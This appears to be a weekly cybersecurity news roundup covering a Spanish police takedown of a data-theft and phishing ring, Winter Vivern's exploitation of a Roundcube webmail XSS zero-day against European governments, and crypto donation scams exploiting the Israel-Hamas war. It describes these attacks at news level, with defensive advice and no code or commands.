The Good, the Bad and the Ugly in Cybersecurity – Week 43

The Good | Multi-Million Dollar Scam Syndicate Dismantled Revealing Stolen Data of 4 Million Citizens

Four million people won justice this week when the Spanish National Police successfully dismantled a cybercriminal organization responsible for monetizing their stolen data. The police agency carried out a total of 16 targeted searches across multiple Spanish cities, resulting in the arrest of 34 members of the criminal group.

Source: Europol

During these raids, authorities seized a cache of illicit items, including firearms, high-end cars, and 80,000 euros in cash. The most critical discovery, however, was the recovery of computers holding sensitive banking information belonging to four million individuals, all ill-gotten by infiltrating financial and credit institutions.

Based on their report, the Spanish police said that the group members were linked to a wide array of fraudulent schemes. Through email and SMS phishing scams, members impersonated delivery companies and electricity suppliers to gain their victims’ trust. The members were also known to call unsuspecting parents, pretending to be ‘sons in distress’ as a means to extract ‘urgently needed’ money. In other cases, they allegedly leveraged an insider within an international tech firm and routed valuable merchandise to addresses under their control. The crime syndicate is estimated to have earned approximately $3.2 million from reselling stolen data to other cybercriminals.

Though the ringleaders of this particular cybercrime ring have been caught, social engineering tactics remain top attack paths into critical systems. Awareness training programs, in combination with multi-factor authentication (MFA), identity threat detection and response (ITDR) solutions, and robust endpoint security, can help both organizations and individual users combat against this type of threat.

The Bad | Pro-Russian APT Exploits Webmail Zero-Day to Harvest Email Data From European Governments

Winter Vivern APT has been found exploiting a zero-day vulnerability in Roundcube’s open-source webmail software. Targeting governments and think tanks in Europe, these attacks leveraged CVE-2023-5631 to harvest emails from compromised accounts. According to a security report this week, this is a marked step up for the threat actor’s cyber operations.

Russia and Belarus-aligned Winter Vivern is a relatively underreported group with limited resources. In the latest string of attacks however, researchers highlighted a notable shift in the APT’s tactics. Where Winter Vivern would typically exploit known flaws for which proof-of-concepts (PoCs) were readily available online, their latest attacks exploited a zero-day vulnerability. Zero-days are those that remain undisclosed to the software’s developers, providing threat actors with an advantage. In this case, Winter Vivern’s exploitation of the Roundcube zero-day allowed them to infiltrate email accounts and exfiltrate valuable data without prior detection or mitigation.

CVE-2023-5631 is a stored cross-site scripting flaw that could allow remote threat actors to load arbitrary JavaScript code. The attacks began with phishing messages containing a Base64-encoded payload embedded within the HTML source code. This payload, when decoded, facilitated a JavaScript injection from a remote server. Then, a second-stage JavaScript component acted as a loader, enabling the execution of a final payload leading to exfiltratration of email messages to a command-and-control (C2) server. A fix for the vulnerability has since been released by Roundcube.

Despite Winter Vivern’s limited resources, they have been able to lure high-value victims through persistent and frequent phishing campaigns and by leveraging unknown flaws in high traffic software. Organizations can stay safe by following regular patch schedules and ensuring deep monitoring within their systems.

The Ugly | Slews of Crypto Donation Scams Hit Social Media Platforms Amid Ongoing Israel-Hamas War

Cybercriminals are exploiting the deadly Israel-Hamas conflict to spread donation and fundraising scams through popular social media platforms. As reported this week, researchers have raised the alarm on how scammers are capitalizing on the ongoing war to solicit donations. So far, over 500 fraudulent emails have been observed impersonating charitable organizations and fundraisers. The cyber scammers have also been seen listing fraudulent cryptocurrency wallet addresses on Instagram, Telegram, and X, taking full advantage of high-strung emotions in the continuing political crisis.

Scam “aid Gaza” account on X (Source: BleepingComputer)

These scams seek to manipulate emotions, often posting graphic images of wounded soldiers, women, and children to spur action. Researchers saw similar social engineering tactics in circulation during the height of the Russo-Ukrainian war and following the Turkey-Syria earthquakes. To increase their chances of success, the scammers are creating multiple text variations to evade spam filters and modifying their designs to target specific groups. Spoofed websites often copy content directly from their legitimate counterparts, but crucially lack details about the organizational staff and contact information as well as fund usage.

Given the prevalence of these scams, the public are being advised to proceed with extreme caution when participating in online fundraisers. The U.S. Federal Trade Commission (FTC) has provided best practices to prevent falling victim to scams and the IRS has also issued an advisory warning citizens against giving into pressure. Always verify the authenticity of charitable organizations before making donations by referring to the government’s official charity register. In hand with social engineering schemes, security practitioners are warned to stay updated on other emerging cyber activity and threat actors currently active in the Middle East.